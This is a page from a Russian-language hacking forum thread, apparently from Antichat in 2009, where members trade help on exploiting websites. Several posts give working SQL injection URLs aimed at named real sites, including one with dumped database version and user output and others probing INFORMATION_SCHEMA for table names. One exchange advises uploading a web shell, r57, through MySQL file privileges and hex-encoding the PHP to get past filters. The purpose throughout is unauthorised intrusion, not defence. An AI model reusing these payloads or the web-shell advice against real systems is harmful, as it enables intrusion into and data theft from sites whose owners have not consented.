Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 229 of 1207
  1. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    спасиб, а то я новичок в этом деле, еще не все понятно)
     
    #4561 wildshaman, 11 Jan 2009
    1 person likes this.
  2. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x7c,version(),user(),database()),22,23,24,25/*

    4.0.27-standard|reciprodate@localhost|reciprodate
     
    #4562 j0ker13, 11 Jan 2009
  3. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Мужики, а что можна с такой ошибкой сделать?

    http://news.qs.kiev.ua/lenta/s.php?s=1'
     
    #4563 vakula, 12 Jan 2009
  4. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    тут вроде фильтрация стоит у меня ничё не прошло...
     
    #4564 ILYAtirtir, 12 Jan 2009
  5. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    А такой вопрос.
    Сайт в локалке у нас...есть скуль
    Code:
    http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
    отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
     
    #4565 vakula, 12 Jan 2009
  6. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    vakula

    version() - за место 3его поля.
     
    #4566 a1ex, 12 Jan 2009
  7. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.
     
    #4567 vakula, 12 Jan 2009
    1 person likes this.
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1. Попробуй:

    Code:
    http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
    2. Возможно, там просто нету вывода.
     
    #4568 R1dex, 12 Jan 2009
  9. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    пустота, а раньше показывало...убрали небось

    p.s. дай линк где описывается поиск уязвимостей

    спс
     
    #4569 vakula, 12 Jan 2009
  10. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. :confused:
     
    #4570 a1ex, 12 Jan 2009
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    #4571 R1dex, 12 Jan 2009
  12. Basilio

    Basilio New Member

    Joined:
    13 Dec 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Помогите, пожалуйста, с заливкой шелла.

    Есть сайт на дедике, на дедике установлена Windows Server 2003.
    Есть MySQL 4 версии, раскрученная.
    Есть путь вида: M:\Inetpub\vhosts\[SITE]\httpdocs\script.php - он выводится при ошибке скули.
    Есть привилегии типа File_Priv

    Будет неплохо, если набросаете хороших faq или статей. Те, что гуглил я не помогли. Желательно расписать очень подробно. с Linux только начинаю дружить.

    Заранее спасиб.
     
    #4572 Basilio, 12 Jan 2009
    Last edited: 12 Jan 2009
  13. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Basilio
    Потом переходишь на scr.php, и шелл копируется в shell.php ;)

    p.s: php код лучше в hex перевести ;)
     
    #4573 aka PSIH, 12 Jan 2009
  14. Basilio

    Basilio New Member

    Joined:
    13 Dec 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    а какой шелл лучше использовать (кинь линк), конфигурацию я написал.
    Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
     
    #4574 Basilio, 12 Jan 2009
  15. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Я вроде видел кроме.
     
    #4575 a1ex, 12 Jan 2009
  16. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    ну r57 попробуй (google.com)

    )) тебе какой шелл то нужен?
    на милворме вообще шеллов нет... ;)
     
    #4576 aka PSIH, 12 Jan 2009
  17. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    лююддии help me
    Есть скуль на сайте
    база MSSQL
    ввожу
    index.cfm?page=search&searchstring[email protected]&searchtype=@@version или (select+system_user)
    все нормально выводит
    но как только пытаюсь вывести имена таблиц,
    (SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES)
    то просто открывается страница сайта, не каких ошибок и прочего
    если так
    (SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES)--
    то ошибка Incorrect syntax near the keyword 'order'.

    В чем трабла? как вывести имена таблиц и колонок?
     
    #4577 mak-shapova, 12 Jan 2009
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ссылку в студию.
     
    #4578 R1dex, 12 Jan 2009
  19. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    вывод ошибок остался
     
    #4579 vakula, 12 Jan 2009
  20. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    #4580 vakula, 12 Jan 2009
(You must log in or sign up to post here.)
Page 229 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.